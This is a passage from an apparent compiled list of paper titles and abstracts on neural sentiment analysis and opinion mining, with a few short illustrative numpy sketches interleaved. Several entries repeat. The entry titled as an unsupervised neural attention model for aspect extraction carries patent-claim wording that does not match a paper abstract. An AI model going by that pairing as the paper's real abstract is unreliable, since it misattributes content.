Such importance degree and text representation are calculated with multiple computational layers, each of which is a neural attention model over an external memory. Experiments on laptop and restaurant datasets demonstrate that our approach performs comparable to state-of-art feature based SVM system, and substantially better than LSTM and attention-based LSTM architectures. On both datasets we show that multiple computational layers could improve the performance. Moreover, our approach is also fast. The deep memory network with 9 layers is 15 times faster than LSTM with a CPU implementation. --- paper_title: A Hierarchical Model of Reviews for Aspect-based Sentiment Analysis paper_content: Opinion mining from customer reviews has become pervasive in recent years. Sentences in reviews, however, are usually classified independently, even though they form part of a review's argumentative structure. Intuitively, sentences in a review build and elaborate upon each other; knowledge of the review structure and sentential context should thus inform the classification of each sentence. We demonstrate this hypothesis for the task of aspect-based sentiment analysis by modeling the interdependencies of sentences in a review with a hierarchical bidirectional LSTM. We show that the hierarchical model outperforms two non-hierarchical baselines, obtains results competitive with the state-of-the-art, and outperforms the state-of-the-art on five multilingual, multi-domain datasets without any hand-engineered features or external resources. --- paper_title: Rationalizing Neural Predictions paper_content: Prediction without justification has limited applicability. As a remedy, we learn to extract pieces of input text as justifications -- rationales -- that are tailored to be short and coherent, yet sufficient for making the same prediction. Our approach combines two modular components, generator and encoder, which are trained to operate well together. The generator specifies a distribution over text fragments as candidate rationales and these are passed through the encoder for prediction. Rationales are never given during training. Instead, the model is regularized by desiderata for rationales. We evaluate the approach on multi-aspect sentiment analysis against manually annotated test cases. Our approach outperforms attention-based baseline by a significant margin. We also successfully illustrate the method on the question retrieval task. --- paper_title: Target-dependent twitter sentiment classification with rich automatic features paper_content: Target-dependent sentiment analysis on Twitter has attracted increasing research attention. Most previous work relies on syntax, such as automatic parse trees, which are subject to noise for informal text such as tweets. In this paper, we show that competitive results can be achieved without the use of syntax, by extracting a rich set of automatic features. In particular, we split a tweet into a left context and a right context according to a given target, using distributed word representations and neural pooling functions to extract features. Both sentiment-driven and standard embeddings are used, and a rich set of neural pooling functions are explored. Sentiment lexicons are used as an additional source of information for feature extraction. In standard evaluation, the conceptually simple method gives a 4.8% absolute improvement over the state-of-the-art on three-way targeted sentiment classification, achieving the best reported results for this task. 
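The last entry above builds target-dependent features by splitting a tweet into the left and right contexts of the target mention and applying neural pooling functions over word embeddings. A stripped-down sketch of that feature extraction follows; the tiny embedding table, the pooling choices, and the example tweet are illustrative assumptions rather than the cited system's actual feature set.

```python
import numpy as np

rng = np.random.default_rng(2)
dim = 5
tweet = "i really love the new phone but battery life is poor".split()
embeddings = {w: rng.standard_normal(dim) for w in tweet}    # stand-in word vectors

def pool(words):
    """Concatenate max/min/mean pooling over the word vectors of one context span."""
    if not words:
        return np.zeros(3 * dim)
    vecs = np.stack([embeddings[w] for w in words])
    return np.concatenate([vecs.max(axis=0), vecs.min(axis=0), vecs.mean(axis=0)])

target = "phone"
i = tweet.index(target)
features = np.concatenate([pool(tweet[:i]), pool(tweet[i + 1:])])   # left + right contexts
print(features.shape)   # (30,) -- fed to a linear classifier over positive/negative/neutral
```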
--- paper_title: Neural Networks for Open Domain Targeted Sentiment paper_content: Open domain targeted sentiment is the joint information extraction task that finds target mentions together with the sentiment towards each mention from a text corpus. The task is typically modeled as a sequence labeling problem, and solved using state-of-the-art labelers such as CRF. We empirically study the effect of word embeddings and automatic feature combinations on the task by extending a CRF baseline using neural networks, which have demonstrated large potentials for sentiment analysis. Results show that the neural model can give better results by significantly increasing the recall. In addition, we propose a novel integration of neural and discrete features, which combines their relative advantages, leading to significantly higher results compared to both baselines. --- paper_title: Representation learning for aspect category detection in online reviews paper_content: User-generated reviews are valuable resources for decision making. Identifying the aspect categories discussed in a given review sentence (e.g., "food" and "service" in restaurant reviews) is an important task of sentiment analysis and opinion mining. Given a predefined aspect category set, most previous researches leverage handcrafted features and a classification algorithm to accomplish the task. The crucial step to achieve better performance is feature engineering which consumes much human effort and may be unstable when the product domain changes. In this paper, we propose a representation learning approach to automatically learn useful features for aspect category detection. Specifically, a semi-supervised word embedding algorithm is first proposed to obtain continuous word representations on a large set of reviews with noisy labels. Afterwards, we propose to generate deeper and hybrid features through neural networks stacked on the word vectors. A logistic regression classifier is finally trained with the hybrid features to predict the aspect category. The experiments are carried out on a benchmark dataset released by SemEval-2014. Our approach achieves the state-of-the-art performance and outperforms the best participating team as well as a few strong baselines. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. 
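As a heavily simplified illustration of the embedding-plus-classifier pipeline in the aspect category detection entry above, the sketch below averages the word vectors of a review sentence and scores a fixed set of aspect categories with independent logistic outputs; the category list, weights, and example sentence are hypothetical, and a real system would train the weights on labeled reviews rather than use random ones.

```python
import numpy as np

rng = np.random.default_rng(3)
dim = 6
categories = ["food", "service", "ambience", "price"]
sentence = "the waiter was rude but the pasta tasted great"
embeddings = {w: rng.standard_normal(dim) for w in sentence.split()}   # stand-in word vectors
W = rng.standard_normal((len(categories), dim)) * 0.1                   # untrained classifier weights
b = np.zeros(len(categories))

def detect_categories(text, threshold=0.5):
    vecs = [embeddings[w] for w in text.split() if w in embeddings]
    x = np.mean(vecs, axis=0)                              # averaged sentence representation
    probs = 1.0 / (1.0 + np.exp(-(W @ x + b)))             # one logistic score per category
    return [c for c, p in zip(categories, probs) if p > threshold]

print(detect_categories(sentence))   # with random weights the output is arbitrary
```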
--- paper_title: An Unsupervised Neural Attention Model for Aspect Extraction paper_content: Methods, systems, and computer-readable storage media for receiving a vocabulary, the vocabulary including text data that is provided as at least a portion of raw data, the raw data being provided in a computer-readable file, associating each word in the vocabulary with a feature vector, providing a sentence embedding for each sentence of the vocabulary based on a plurality of feature vectors to provide a plurality of sentence embeddings, providing a reconstructed sentence embedding for each sentence embedding based on a weighted parameter matrix to provide a plurality of reconstructed sentence embeddings, and training the unsupervised neural attention model based on the sentence embeddings and the reconstructed sentence embeddings to provide a trained neural attention model, the trained neural attention model being used to automatically determine aspects from the vocabulary. --- paper_title: Aspect extraction for opinion mining with a deep convolutional neural network paper_content: In this paper, we present the first deep learning approach to aspect extraction in opinion mining. Aspect extraction is a subtask of sentiment analysis that consists in identifying opinion targets in opinionated text, i.e., in detecting the specific aspects of a product or service the opinion holder is either praising or complaining about. We used a 7-layer deep convolutional neural network to tag each word in opinionated sentences as either aspect or non-aspect word. We also developed a set of linguistic patterns for the same purpose and combined them with the neural network. The resulting ensemble classifier, coupled with a word-embedding model for sentiment analysis, allowed our approach to obtain significantly better accuracy than state-of-the-art methods. --- paper_title: Unsupervised Word and Dependency Path Embeddings for Aspect Term Extraction paper_content: In this paper, we develop a novel approach to aspect term extraction based on unsupervised learning of distributed representations of words and dependency paths. The basic idea is to connect two words (w1 and w2) with the dependency path (r) between them in the embedding space. Specifically, our method optimizes the objective w1 + r = w2 in the low-dimensional space, where the multi-hop dependency paths are treated as a sequence of grammatical relations and modeled by a recurrent neural network. Then, we design the embedding features that consider linear context and dependency context information, for the conditional random field (CRF) based aspect term extraction. Experimental results on the SemEval datasets show that, (1) with only embedding features, we can achieve state-of-the-art results; (2) our embedding method which incorporates the syntactic information among words yields better performance than other representative ones in aspect term extraction. --- paper_title: Distance Metric Learning for Aspect Phrase Grouping paper_content: Aspect phrase grouping is an important task in aspect-level sentiment analysis. It is a challenging problem due to polysemy and context dependency. We propose an Attention-based Deep Distance Metric Learning (ADDML) method, by considering aspect phrase representation as well as context representation. First, leveraging the characteristics of the review text, we automatically generate aspect phrase sample pairs for distant supervision. 
Second, we feed word embeddings of aspect phrases and their contexts into an attention-based neural network to learn feature representation of contexts. Both aspect phrase embedding and context embedding are used to learn a deep feature subspace for measuring the distances between aspect phrases for K-means clustering. Experiments on four review datasets show that the proposed method outperforms state-of-the-art strong baseline methods. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any task-specific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: Extracting Opinion Expressions with semi-Markov Conditional Random Fields paper_content: Extracting opinion expressions from text is usually formulated as a token-level sequence labeling task tackled using Conditional Random Fields (CRFs). CRFs, however, do not readily model potentially useful segment-level information like syntactic constituent structure. Thus, we propose a semi-CRF-based approach to the task that can perform sequence labeling at the segment level. We extend the original semi-CRF model (Sarawagi and Cohen, 2004) to allow the modeling of arbitrarily long expressions while accounting for their likely syntactic structure when modeling segment boundaries. We evaluate performance on two opinion extraction tasks, and, in contrast to previous sequence labeling approaches to the task, explore the usefulness of segment-level syntactic parse features. Experimental results demonstrate that our approach outperforms state-of-the-art methods for both opinion expression tasks. --- paper_title: Deep Recursive Neural Networks for Compositionality in Language paper_content: Recursive neural networks comprise a class of architecture that can operate on structured input.
They have been previously successfully applied to model com-positionality in natural language using parse-tree-based structural representations. Even though these architectures are deep in structure, they lack the capacity for hierarchical representation that exists in conventional deep feed-forward networks as well as in recently investigated deep recurrent neural networks. In this work we introduce a new architecture — a deep recursive neural network (deep RNN) — constructed by stacking multiple recursive layers. We evaluate the proposed model on the task of fine-grained sentiment classification. Our results show that deep RNNs outperform associated shallow counterparts that employ the same number of parameters. Furthermore, our approach outperforms previous baselines on the sentiment analysis task, including a multiplicative RNN variant as well as the recently introduced paragraph vectors, achieving new state-of-the-art results. We provide exploratory analyses of the effect of multiple layers and show that they capture different aspects of compositionality in language. --- paper_title: Neural Networks for Integrating Compositional and Non-compositional Sentiment in Sentiment Composition paper_content: This paper proposes neural networks for integrating compositional and non-compositional sentiment in the process of sentiment composition, a type of semantic composition that optimizes a sentiment objective. We enable individual composition operations in a recursive process to possess the capability of choosing and merging information from these two types of sources. We propose our models in neural network frameworks with structures, in which the merging parameters can be learned in a principled way to optimize a well-defined objective. We conduct experiments on the Stanford Sentiment Treebank and show that the proposed models achieve better results over the model that lacks this ability. --- paper_title: Recursive Deep Models for Semantic Compositionality Over a Sentiment Treebank paper_content: Semantic word spaces have been very useful but cannot express the meaning of longer phrases in a principled way. Further progress towards understanding compositionality in tasks such as sentiment detection requires richer supervised training and evaluation resources and more powerful models of composition. To remedy this, we introduce a Sentiment Treebank. It includes fine grained sentiment labels for 215,154 phrases in the parse trees of 11,855 sentences and presents new challenges for sentiment compositionality. To address them, we introduce the Recursive Neural Tensor Network. When trained on the new treebank, this model outperforms all previous methods on several metrics. It pushes the state of the art in single sentence positive/negative classification from 80% up to 85.4%. The accuracy of predicting fine-grained sentiment labels for all phrases reaches 80.7%, an improvement of 9.7% over bag of features baselines. Lastly, it is the only model that can accurately capture the effects of negation and its scope at various tree levels for both positive and negative phrases. --- paper_title: Recognizing opinion sources based on a new categorization of opinion types paper_content: Recognizing sources of opinions is an important task in sentiment analysis. Different from previous works which categorize an opinion according to whether the source is the writer or the source is a noun phrase, we propose a new categorization of opinions according to the role that the source plays. 
The source of a participant opinion is a participant in the event that triggers the opinion. On the contrary, the source of a non-participant opinion is not a participant. Based on this new categorization, we classify an opinion using phrase-level embeddings. A transductive learning method is used for the classifier since there is no existing annotated corpora of this new categorization. A joint prediction model of Probabilistic Soft Logic then recognizes the sources of the two types of opinions in a single model. The experiments have shown that our model improves recognizing sources of opinions over baselines and several state-of-the-art works. --- paper_title: Joint Inference for Fine-grained Opinion Extraction paper_content: This paper addresses the task of finegrained opinion extraction ‐ the identification of opinion-related entities: the opinion expressions, the opinion holders, and the targets of the opinions, and the relations between opinion expressions and their targets and holders. Most existing approaches tackle the extraction of opinion entities and opinion relations in a pipelined manner, where the interdependencies among different extraction stages are not captured. We propose a joint inference model that leverages knowledge from predictors that optimize subtasks of opinion extraction, and seeks a globally optimal solution. Experimental results demonstrate that our joint inference approach significantly outperforms traditional pipeline methods and baselines that tackle subtasks in isolation for the problem of opinion extraction. --- paper_title: Neural Networks for Open Domain Targeted Sentiment paper_content: Open domain targeted sentiment is the joint information extraction task that finds target mentions together with the sentiment towards each mention from a text corpus. The task is typically modeled as a sequence labeling problem, and solved using state-of-the-art labelers such as CRF. We empirically study the effect of word embeddings and automatic feature combinations on the task by extending a CRF baseline using neural networks, which have demonstrated large potentials for sentiment analysis. Results show that the neural model can give better results by significantly increasing the recall. In addition, we propose a novel integration of neural and discrete features, which combines their relative advantages, leading to significantly higher results compared to both baselines. --- paper_title: Weakly-supervised deep learning for customer review sentiment classification paper_content: Sentiment analysis is one of the key challenges for mining online user generated content. In this work, we focus on customer reviews which are an important form of opinionated content. The goal is to identify each sentence's semantic orientation (e.g. positive or negative) of a review. Traditional sentiment classification methods often involve substantial human efforts, e.g. lexicon construction, feature engineering. In recent years, deep learning has emerged as an effective means for solving sentiment classification problems. A neural network intrinsically learns a useful representation automatically without human efforts. However, the success of deep learning highly relies on the availability of large-scale training data. In this paper, we propose a novel deep learning framework for review sentiment classification which employs prevalently available ratings as weak supervision signals. 
The framework consists of two steps: (1) learn a high level representation (embedding space) which captures the general sentiment distribution of sentences through rating information; (2) add a classification layer on top of the embedding layer and use labeled sentences for supervised fine-tuning. Experiments on review data obtained from Amazon show the efficacy of our method and its superiority over baseline methods. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any task-specific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Distributed Representations of Sentences and Documents paper_content: Many machine learning algorithms require the input to be represented as a fixed-length feature vector. When it comes to texts, one of the most common fixed-length features is bag-of-words. Despite their popularity, bag-of-words features have two major weaknesses: they lose the ordering of the words and they also ignore semantics of the words. For example, "powerful," "strong" and "Paris" are equally distant. In this paper, we propose Paragraph Vector, an unsupervised algorithm that learns fixed-length feature representations from variable-length pieces of texts, such as sentences, paragraphs, and documents. Our algorithm represents each document by a dense vector which is trained to predict words in the document. Its construction gives our algorithm the potential to overcome the weaknesses of bag-of-words models. Empirical results show that Paragraph Vectors outperforms bag-of-words models as well as other techniques for text representations. Finally, we achieve new state-of-the-art results on several text classification and sentiment analysis tasks. --- paper_title: Collaborative multi-level embedding learning from reviews for rating prediction paper_content: We investigate the problem of personalized review-based rating prediction which aims at predicting users' ratings for items that they have not evaluated by using their historical reviews and ratings. Most of existing methods solve this problem by integrating topic model and latent factor model to learn interpretable user and items factors. However, these methods cannot utilize word local context information of reviews. Moreover, it simply restricts user and item representations equivalent to their review representations, which may bring some irrelevant information in review text and harm the accuracy of rating prediction. In this paper, we propose a novel Collaborative Multi-Level Embedding (CMLE) model to address these limitations. The main technical contribution of CMLE is to integrate word embedding model with standard matrix factorization model through a projection level.
This allows CMLE to inherit the ability of capturing word local context information from word embedding model and relax the strict equivalence requirement by projecting review embedding to user and item embeddings. A joint optimization problem is formulated and solved through an efficient stochastic gradient ascent algorithm. Empirical evaluations on real datasets show CMLE outperforms several competitive methods and can solve the two limitations well. --- paper_title: Do Multi-Sense Embeddings Improve Natural Language Understanding? paper_content: Learning a distinct representation for each sense of an ambiguous word could lead to more powerful and fine-grained models of vector-space representations. Yet while 'multi-sense' methods have been proposed and tested on artificial word-similarity tasks, we don't know if they improve real natural language understanding tasks. In this paper we introduce a multi-sense embedding model based on Chinese Restaurant Processes that achieves state of the art performance on matching human word similarity judgments, and propose a pipelined architecture for incorporating multi-sense embeddings into language understanding. We then test the performance of our model on part-of-speech tagging, named entity recognition, sentiment analysis, semantic relation identification and semantic relatedness, controlling for embedding dimensionality. We find that multi-sense embeddings do improve performance on some tasks (part-of-speech tagging, semantic relation identification, semantic relatedness) but not on others (named entity recognition, various forms of sentiment analysis). We discuss how these differences may be caused by the different role of word sense information in each of the tasks. The results highlight the importance of testing embedding models in real applications. --- paper_title: Predicting Polarities of Tweets by Composing Word Embeddings with Long Short-Term Memory paper_content: In this paper, we introduce Long Short-Term Memory (LSTM) recurrent network for twitter sentiment prediction. With the help of gates and constant error carousels in the memory block structure, the model could handle interactions between words through a flexible compositional function. Experiments on a public noisy labelled data show that our model outperforms several feature-engineering approaches, with the result comparable to the current best data-driven technique. According to the evaluation on a generated negation phrase test set, the proposed architecture doubles the performance of non-neural model based on bag-of-word features. Furthermore, words with special functions (such as negation and transition) are distinguished and the dissimilarities of words with opposite sentiment are magnified. An interesting case study on negation expression processing shows a promising potential of the architecture dealing with complex sentiment phrases. --- paper_title: Learning Sentiment-Specific Word Embedding for Twitter Sentiment Classification paper_content: We present a method that learns word embedding for Twitter sentiment classification in this paper. Most existing algorithms for learning continuous word representations typically only model the syntactic context of words but ignore the sentiment of text. This is problematic for sentiment analysis as they usually map words with similar syntactic context but opposite sentiment polarity, such as good and bad, to neighboring word vectors.
We address this issue by learning sentimentspecific word embedding (SSWE), which encodes sentiment information in the continuous representation of words. Specifically, we develop three neural networks to effectively incorporate the supervision from sentiment polarity of text (e.g. sentences or tweets) in their loss functions. To obtain large scale training corpora, we learn the sentiment-specific word embedding from massive distant-supervised tweets collected by positive and negative emoticons. Experiments on applying SSWE to a benchmark Twitter sentiment classification dataset in SemEval 2013 show that (1) the SSWE feature performs comparably with hand-crafted features in the top-performed system; (2) the performance is further improved by concatenating SSWE with existing feature set. --- paper_title: Unsupervised Word and Dependency Path Embeddings for Aspect Term Extraction paper_content: In this paper, we develop a novel approach to aspect term extraction based on unsupervised learning of distributed representations of words and dependency paths. The basic idea is to connect two words (w1 and w2) with the dependency path (r) between them in the embedding space. Specifically, our method optimizes the objective w1 + r = w2 in the low-dimensional space, where the multi-hop dependency paths are treated as a sequence of grammatical relations and modeled by a recurrent neural network. Then, we design the embedding features that consider linear context and dependency context information, for the conditional random field (CRF) based aspect term extraction. Experimental results on the SemEval datasets show that, (1) with only embedding features, we can achieve state-of-the-art results; (2) our embedding method which incorporates the syntactic information among words yields better performance than other representative ones in aspect term extraction. --- paper_title: Learning Word Vectors for Sentiment Analysis paper_content: Unsupervised vector-based approaches to semantics can model rich lexical meanings, but they largely fail to capture sentiment information that is central to many word meanings and important for a wide range of NLP tasks. We present a model that uses a mix of unsupervised and supervised techniques to learn word vectors capturing semantic term--document information as well as rich sentiment content. The proposed model can leverage both continuous and multi-dimensional sentiment information as well as non-sentiment annotations. We instantiate the model to utilize the document-level sentiment polarity annotations present in many online documents (e.g. star ratings). We evaluate the model using small, widely used sentiment and subjectivity corpora and find it out-performs several previously introduced methods for sentiment classification. We also introduce a large dataset of movie reviews to serve as a more robust benchmark for work in this area. --- paper_title: Sentiment Embeddings with Applications to Sentiment Analysis paper_content: We propose learning sentiment-specific word embeddings dubbed sentiment embeddings in this paper. Existing word embedding learning algorithms typically only use the contexts of words but ignore the sentiment of texts. It is problematic for sentiment analysis because the words with similar contexts but opposite sentiment polarity, such as good and bad , are mapped to neighboring word vectors. We address this issue by encoding sentiment information of texts (e.g., sentences and words) together with contexts of words in sentiment embeddings. 
By combining context and sentiment level evidences, the nearest neighbors in sentiment embedding space are semantically similar and it favors words with the same sentiment polarity. In order to learn sentiment embeddings effectively, we develop a number of neural networks with tailoring loss functions, and collect massive texts automatically with sentiment signals like emoticons as the training data. Sentiment embeddings can be naturally used as word features for a variety of sentiment analysis tasks without feature engineering. We apply sentiment embeddings to word-level sentiment analysis, sentence level sentiment classification, and building sentiment lexicons. Experimental results show that sentiment embeddings consistently outperform context-based embeddings on several benchmark datasets of these tasks. This work provides insights on the design of neural networks for learning task-specific word embeddings in other natural language processing tasks. --- paper_title: Sentiment classification based on supervised latent n-gram analysis paper_content: In this paper, we propose an efficient embedding for modeling higher-order (n-gram) phrases that projects the n-grams to low-dimensional latent semantic space, where a classification function can be defined. We utilize a deep neural network to build a unified discriminative framework that allows for estimating the parameters of the latent space as well as the classification function with a bias for the target classification task at hand. We apply the framework to large-scale sentimental classification task. We present comparative evaluation of the proposed method on two (large) benchmark data sets for online product reviews. The proposed method achieves superior performance in comparison to the state of the art. --- paper_title: Improving Twitter sentiment classification using topic-enriched multi-prototype word embeddings paper_content: It has been shown that learning distributed word representations is highly useful for Twitter sentiment classification. Most existing models rely on a single distributed representation for each word. This is problematic for sentiment classification because words are often polysemous and each word can contain different sentiment polarities under different topics. We address this issue by learning topic-enriched multi-prototype word embeddings (TMWE). In particular, we develop two neural networks which 1) learn word embeddings that better capture tweet context by incorporating topic information, and 2) learn topic-enriched multiple prototype embeddings for each word. Experiments on Twitter sentiment benchmark datasets in SemEval 2013 show that TMWE outperforms the top system with hand-crafted features, and the current best neural network model. --- paper_title: Sarcasm SIGN: Interpreting Sarcasm with Sentiment Based Monolingual Machine Translation paper_content: Sarcasm is a form of speech in which speakers say the opposite of what they truly mean in order to convey a strong sentiment. In other words,"Sarcasm is the giant chasm between what I say, and the person who doesn't get it.". In this paper we present the novel task of sarcasm interpretation, defined as the generation of a non-sarcastic utterance conveying the same message as the original sarcastic one. We introduce a novel dataset of 3000 sarcastic tweets, each interpreted by five human judges. Addressing the task as monolingual machine translation (MT), we experiment with MT algorithms and evaluation measures. 
We then present SIGN: an MT based sarcasm interpretation algorithm that targets sentiment words, a defining element of textual sarcasm. We show that while the scores of n-gram based automatic measures are similar for all interpretation models, SIGN's interpretations are scored higher by humans for adequacy and sentiment polarity. We conclude with a discussion on future research directions for our new task. --- paper_title: Are Word Embedding-based Features Useful for Sarcasm Detection? paper_content: This paper makes a simple increment to state-of-the-art in sarcasm detection research. Existing approaches are unable to capture subtle forms of context incongruity which lies at the heart of sarcasm. We explore if prior work can be enhanced using semantic similarity/discordance between word embeddings. We augment word embedding-based features to four feature sets reported in the past. We also experiment with four types of word embeddings. We observe an improvement in sarcasm detection, irrespective of the word embedding used or the original feature set to which our features are augmented. For example, this augmentation results in an improvement in F-score of around 4\% for three out of these four feature sets, and a minor degradation in case of the fourth, when Word2Vec embeddings are used. Finally, a comparison of the four embeddings shows that Word2Vec and dependency weight-based features outperform LSA and GloVe, in terms of their benefit to sarcasm detection. --- paper_title: A Deeper Look into Sarcastic Tweets Using Deep Convolutional Neural Networks paper_content: Sarcasm detection is a key task for many natural language processing tasks. In sentiment analysis, for example, sarcasm can flip the polarity of an "apparently positive" sentence and, hence, negatively affect polarity detection performance. To date, most approaches to sarcasm detection have treated the task primarily as a text categorization problem. Sarcasm, however, can be expressed in very subtle ways and requires a deeper understanding of natural language that standard text categorization techniques cannot grasp. In this work, we develop models based on a pre-trained convolutional neural network for extracting sentiment, emotion and personality features for sarcasm detection. Such features, along with the network's baseline features, allow the proposed models to outperform the state of the art on benchmark datasets. We also address the often ignored generalizability issue of classifying data that have not been seen by the models at learning phase. --- paper_title: Document Modeling with Gated Recurrent Neural Network for Sentiment Classification paper_content: Document level sentiment classification remains a challenge: encoding the intrinsic relations between sentences in the semantic meaning of a document. To address this, we introduce a neural network model to learn vector-based document representation in a unified, bottom-up fashion. The model first learns sentence representation with convolutional neural network or long short-term memory. Afterwards, semantics of sentences and their relations are adaptively encoded in document representation with gated recurrent neural network. We conduct document level sentiment classification on four large-scale review datasets from IMDB and Yelp Dataset Challenge. 
Experimental results show that: (1) our neural model shows superior performances over several state-of-the-art algorithms; (2) gated recurrent neural network dramatically outperforms standard recurrent neural network in document modeling for sentiment classification. 1 --- paper_title: A Question Answering Approach to Emotion Cause Extraction paper_content: Emotion cause extraction aims to identify the reasons behind a certain emotion expressed in text. It is a much more difficult task compared to emotion classification. Inspired by recent advances in using deep memory networks for question answering (QA), we propose a new approach which considers emotion cause identification as a reading comprehension task in QA. Inspired by convolutional neural networks, we propose a new mechanism to store relevant context in different memory slots to model context information. Our proposed approach can extract both word level sequence features and lexical features. Performance evaluation shows that our method achieves the state-of-the-art performance on a recently released emotion cause dataset, outperforming a number of competitive baselines by at least 3.01% in F-measure. --- paper_title: Emotional Chatting Machine: Emotional Conversation Generation with Internal and External Memory paper_content: Perception and expression of emotion are key factors to the success of dialogue systems or conversational agents. However, this problem has not been studied in large-scale conversation generation so far. In this paper, we propose Emotional Chatting Machine (ECM) that can generate appropriate responses not only in content (relevant and grammatical) but also in emotion (emotionally consistent). To the best of our knowledge, this is the first work that addresses the emotion factor in large-scale conversation generation. ECM addresses the factor using three new mechanisms that respectively (1) models the high-level abstraction of emotion expressions by embedding emotion categories, (2) captures the change of implicit internal emotion states, and (3) uses explicit emotion expressions with an external emotion vocabulary. Experiments show that the proposed model can generate responses appropriate not only in content but also in emotion. --- paper_title: Gated neural networks for targeted sentiment analysis paper_content: Targeted sentiment analysis classifies the sentiment polarity towards each target entity mention in given text documents. Seminal methods extract manual discrete features from automatic syntactic parse trees in order to capture semantic information of the enclosing sentence with respect to a target entity mention. Recently, it has been shown that competitive accuracies can be achieved without using syntactic parsers, which can be highly inaccurate on noisy text such as tweets. This is achieved by applying distributed word representations and rich neural pooling functions over a simple and intuitive segmentation of tweets according to target entity mentions. In this paper, we extend this idea by proposing a sentence-level neural model to address the limitation of pooling functions, which do not explicitly model tweet-level semantics. First, a bi-directional gated neural network is used to connect the words in a tweet so that pooling functions can be applied over the hidden layer instead of words for better representing the target and its contexts. Second, a three-way gated neural network structure is used to model the interaction between the target mention and its surrounding contexts. 
Experiments show that our proposed model gives significantly higher accuracies compared to the current best method for targeted sentiment analysis. --- paper_title: Using millions of emoji occurrences to learn any-domain representations for detecting sentiment, emotion and sarcasm paper_content: NLP tasks are often limited by scarcity of manually annotated data. In social media sentiment analysis and related tasks, researchers have therefore used binarized emoticons and specific hashtags as forms of distant supervision. Our paper shows that by extending the distant supervision to a more diverse set of noisy labels, the models can learn richer representations. Through emoji prediction on a dataset of 1246 million tweets containing one of 64 common emojis we obtain state-of-the-art performance on 8 benchmark datasets within sentiment, emotion and sarcasm detection using a single pretrained model. Our analyses confirm that the diversity of our emotional labels yield a performance improvement over previous distant supervision approaches. --- paper_title: Beyond object recognition: visual sentiment analysis with deep coupled adjective and noun neural networks paper_content: Visual sentiment analysis aims to automatically recognize positive and negative emotions from images. There are three main challenges, including large intra-class variance, fine-grained image categories, and scalability. Most existing methods predominantly focus on one or two challenges, which has limited their performance. In this paper, we propose a novel visual sentiment analysis approach with deep coupled adjective and noun neural networks. Specifically, to reduce the large intra-class variance, we first learn a shared middle-level sentiment representation by jointly learning an adjective and a noun deep neural network with weak label supervision. Second, based on the learned sentiment representation, a prediction network is further optimized to deal with the subtle differences which often exist in the fine-grained image categories. The three networks are trained in an end-to-end manner, where the middle-level representations learned in previous two networks can guide the sentiment network to achieve high performance and fast convergence. Third, we generalize the training with mutual supervision between the learned adjective and noun networks by a Rectified Kullback-Leibler loss (ReKL), when the adjective and noun labels are not available. Extensive experiments on two widely-used datasets show that our method outperforms the state-of-the-art on SentiBank dataset with 10.2% accuracy gain and surpasses the previous best approach on Twitter dataset with clear margins. --- paper_title: Using Deep and Convolutional Neural Networks for Accurate Emotion Classification on DEAP Dataset. paper_content: Emotion recognition is an important field of research in Brain Computer Interactions. As technology and the understanding of emotions are advancing, there are growing opportunities for automatic emotion recognition systems. Neural networks are a family of statistical learning models inspired by biological neural networks and are used to estimate functions that can depend on a large number of inputs that are generally unknown. In this paper we seek to use this effectiveness of Neural Networks to classify user emotions using EEG signals from the DEAP (Koelstra et al (2012)) dataset which represents the benchmark for Emotion classification research. 
We explore 2 different Neural Models, a simple Deep Neural Network and a Convolutional Neural Network for classification. Our model provides the state-of-the-art classification accuracy, obtaining 4.51 and 4.96 percentage point improvements over (Rozgic et al (2013)) classification of Valence and Arousal into 2 classes (High and Low) and 13.39 and 6.58 percentage point improvements over (Chung and Yoon(2012)) classification of Valence and Arousal into 3 classes (High, Normal and Low). Moreover our research is a testament that Neural Networks could be robust classifiers for brain signals, even outperforming traditional learning techniques. --- paper_title: Tensor Fusion Network for Multimodal Sentiment Analysis paper_content: Multimodal sentiment analysis is an increasingly popular research area, which extends the conventional language-based definition of sentiment analysis to a multimodal setup where other relevant modalities accompany language. In this paper, we pose the problem of multimodal sentiment analysis as modeling intra-modality and inter-modality dynamics. We introduce a novel model, termed Tensor Fusion Network, which learns both such dynamics end-to-end. The proposed approach is tailored for the volatile nature of spoken language in online videos as well as accompanying gestures and voice. In the experiments, our model outperforms state-of-the-art approaches for both multimodal and unimodal sentiment analysis. --- paper_title: Select-additive learning: Improving generalization in multimodal sentiment analysis paper_content: Multimodal sentiment analysis is drawing an increasing amount of attention these days. It enables mining of opinions in video reviews which are now available aplenty on online 